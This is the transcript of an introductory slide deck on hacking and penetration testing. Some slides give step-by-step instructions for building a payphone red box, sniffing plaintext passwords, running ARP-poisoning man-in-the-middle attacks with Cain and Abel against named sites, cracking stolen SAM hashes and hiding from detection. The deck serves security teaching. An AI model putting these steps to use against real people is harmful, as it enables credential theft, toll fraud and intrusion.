cybersecurity cyberlab1

29
Hacking: What is it and how is it done? Introduction to Cybersecurity Slides by Raymond Borges

Upload: rayborg

Post on 31-Oct-2014

824 views

Category:

Documents


3 download

DESCRIPTION

Brief intro to computer security and pentesting.

TRANSCRIPT

1. Hacking: What is it and how is it done?Introduction to Cybersecurity Slides by Raymond Borges 2. OutlineBackgroundHacking 101 The penetration test Reconnaissance Enumeration Gaining access Privilege escalation Maintaining access StealthConclusion 3. BackgroundPhone freaks were some of the first hackers Phreaking- activity of a culture of people who study, experiment with, or explore telecom Blue box- tone generator capable of producing frequencies to hack phone trunks 4. BackgroundBelow is the blue box built by Steve Wozniak, ondisplay at the Computer History Museum andalso the Captain Crunch whistle 5. The Blue Box How did the Blue Box work?1. User places a long distance telephone call2. When the call rings he sends the 2600Hz tone3. Basically, this tone is signaling you hung up4. Line makes a "Ka-Cheep" noise, followed bysilence, it is now waiting for routing digits5. Dial a "Key Pulse" followed by telephone #6. You just made a free call 6. Phreaking boxes!!! Blue- can make calls initiated by generating 2600Hz tone followed by Red- generates tones to simulate inserting coins in pay phones Black- small electronic circuit added to a telephone which provided the caller with a free call. 7. Make your own Red Box1. Download any free tone generator e.g. NCH Tone Generator2. Create at least one or tone 5, 10 25 sequence by combining 1.7KHz and 2.2KHzi.e. 5=One 66 ms tone3. Save and playback toneto payphone microphone4. Free calls! 8. Hacking 101 Hacking - is the investigation and exploitation of system vulnerabilities.Hacking expertise varies, some categories are: Newbies- Basic concepts but little practice Cyberpunks Know the tools of the trade Coders- Write the tools to automate hacks Cyber terrorists-Threats to national security 9. Hacker Hats White hats- Security professionals (defense) Black hats- Crackers, bad guys Grey hats In between 10. The penetration testCommon steps in a pen test or hacking1. Reconnaissance2. Scanning and enumeration3. Gaining access4. Escalation of privileges5. Maintaining access6. Covering tracks 11. Information Gathering (Recon.) 12. ScanningThe steps for a scanning methodology are:1. Identify live systems2. Discover open ports3. Identify the OS and services4. Scan for vulnerabilities 13. Gaining Access Once known vulnerabilities are enumerated Learn the extent of usefulness of exploitationThe keystone of security is authentication andthe most used method is the password 14. Password AttacksPassive online attack e.g. a packet sniffercapturing a password in plaintext in networktrafficActive online attack e.g. password guessingOffline password cracking e.g. stealing thepassword hashes and offline crackingKeylogging e.g. hardware or softwarekeystroke logger 15. Passive online attack0.http://www.httprecipes.com/1/2/forms.php1.Run Wireshark2.Filter http3.Find post method4.Follow TCP stream5. You have username and password in the clearif server isnt using https SSL or other encryption 16. Replay and Man-in-the-middle When passwords cant be caught in plaintext Man-in-the-middle ARP poisoning Session hijacking Replay attack 17. Cain and Abel (ARP poisoning)1. Install Cain and Abel2. Connect to a network3. Select sniffer tab4. Start sniffer and select network interface5. Select hosts on bottom and press then ok6. Select bottom APR tab and click top window7. Press and select target IP then hit Ok8. Hit then select passwords tab, (http) 18. Cain and Abel (ARP poisoning) Man-in-the-middle (Worked in Firefox7) http://www.voddler.com/ (clueless of attack) http://www.cnet.com/ (clueless of attack) https://www.fxhome.com/ (invalid certificate) https://www.yahoo.com/ (invalid certificate) https://www.amazon.com/ (invalid certificate)(Invalid certificate, worked in Internet Explorer 9 if continues) https://accounts.google.com (Gmail) (sometimes, *cookies) https://login.live.com (Hotmail) 19. Cain and Abel (ARP poisoning)Secured (Internet Explorer and Firefox) http://www.facebook.com https://www.facebook.com https://www.paypal.com/Firefox version 7Secured, detects invalid certificate w/no continue https://www.paypal.com 20. Active online attack (Guessing)1. Your partner, child or pets name, possibly followed by a 0 or 1 (because theyre always making you use a number, arent they?)2. The last 4 digits of your social security number.3. 123 or 1234 or 123456.4. password5. Your city, or college, football team name.6. Date of birth yours, your partners or your childs.7. god8. letmein This list covered about 20% of9. money passwords as of March10. love 31, 2010, according to Lifehacker.com 21. Offline password cracking Passwords on Windows systems found in SAMC:windowssystem32configC:windowsrepair copy sam and system fileshttp://www.youtube.com/watch?v=SDsJbgl2J8E Passwords in Linux are found in shadow file /etc/shadow Crack password hash files (Cain and Abel) 22. Offline password cracking1. Copy sam and system files2. Run Cain and Abel3. Select cracker tab4. Select LM and NTLM5. Select plus sign6. Add sam and system files7. Copy key, exit and paste8. Right click and crack with LM up to Vista 23. KeyloggersRecord every keystroke the user makes Software keyloggers can send passwords to remote computers(low risk for hacker) Hardware keyloggers may be small dongles placed on the back of a desktop(high risk for hacker) 24. Other forms of Gaining Access Trojans and backdoors A Trojan can accomplish any number of things from sending email, keylogging and stealing data to turning your computer into a zombie. Usually it provides an entrance and a form of maintaining access by implementing a backdoor. 25. Privilege Escalation Once inside a hacker can seek better ways of cracking the root or administrator password A good tool that is somewhat famous in the hacker community is Metasploit. Metasploit is a semi-automated tool for find vulnerabilities that may lead to role elevation. 26. Stealth Some tactics are:1. Use passive attacks2. Use proxies3. Use the Tor anonymity network if possible4. Hack from open or public access points5. Use attack diversions when performing the real active attacks that could expose you 27. ConclusionNothing is secureSecurity - matter of cost of attack vs info valueCost can be calculated in $dollars and effortActive attack = High RiskPassive attack = Low Risk 28. References Matt Walker, CEH ALL-IN-ONE, 2011 Williams Stalling, Lawrie Brown, Computer Security, 2008 Jon Erickson, Hacking The Art of Exploitation, 2008 http://www.nch.com.au/tonegen/faq.html http://sectools.org/index.html http://www.lifehacker.com.au/2010/03/how- i%E2%80%99d-hack-your-weak-passwords/ http://www.youtube.com/watch?v=7ezGTP99xSw http://www.wireshark.org/docs/wsug_html_chunked/ChW orkBuildDisplayFilterSection.html http://www.youtube.com/watch?v=C_trnrkkPUs&feature=r elated 29. Questions?Youve been hacked!